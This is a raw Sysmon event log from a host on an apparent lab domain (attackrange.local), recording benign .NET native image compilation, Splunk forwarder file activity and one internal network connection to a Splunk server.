21:06:30.510{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A256-60D3-D304-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.510{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A256-60D3-D304-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:30.307{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A256-60D3-D204-00000000CF01}1324C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.291{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AA69A32C1B896192B52EC5168909AE5,SHA256=B05160E4AC42E3761DB3D12E6A60643D97E5E85D8EB8FBA53E6235D8B8351E6A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.275{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A256-60D3-D204-00000000CF01}1324C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:33.041{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A259-60D3-DC04-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:34.978{4DB9351A-A25A-60D3-E104-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\186c-0\System.Web.RegularExpressions.dll2021-06-23 21:06:34.978 10341000x800000000000000022110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:34.853{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25A-60D3-E104-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:34.838{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A25A-60D3-E104-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:34.838{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25A-60D3-E104-00000000CF01}6252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000022107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:34.822{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A5FFC1508D45BCA57992DBD32ECD604,SHA256=4D25A9FD095A7A11BA6448AD3F23DC56F796BE0D3B662869F10E794A6F81206D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:34.791{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25A-60D3-E004-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:34.775{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A25A-60D3-E004-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:34.775{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25A-60D3-E004-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:34.666{4DB9351A-A259-60D3-DF04-00000000CF01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1108-0\System.Web.Mobile.dll2021-06-23 21:06:34.666 23542300x800000000000000022102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:34.572{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40ECC7016E0B5F9D1254AD48A7B17974,SHA256=2AA86FA0CB03150BBD62B5480984795B167EB86A9BFF691E19391F8C3DA1F21C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000022101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:33.221{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61452-false10.0.1.12-8000- 23542300x800000000000000022125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.603{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CC078E510667E37488D33D715999A62,SHA256=09E7237428A2728C8D7139347EDD73A22415DF2F67DDF4B26FE77F62B8790301,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:35.432{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25B-60D3-E504-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.416{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25B-60D3-E504-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:35.416{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25B-60D3-E504-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:35.260{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25B-60D3-E404-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.244{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A25B-60D3-E404-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:35.244{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25B-60D3-E404-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:35.197{4DB9351A-A25B-60D3-E304-00000000CF01}5584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15d0-0\System.Web.Routing.dll2021-06-23 21:06:35.197 10341000x800000000000000022117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:35.166{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25B-60D3-E304-00000000CF01}5584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.150{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A25B-60D3-E304-00000000CF01}5584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:35.150{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25B-60D3-E304-00000000CF01}5584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
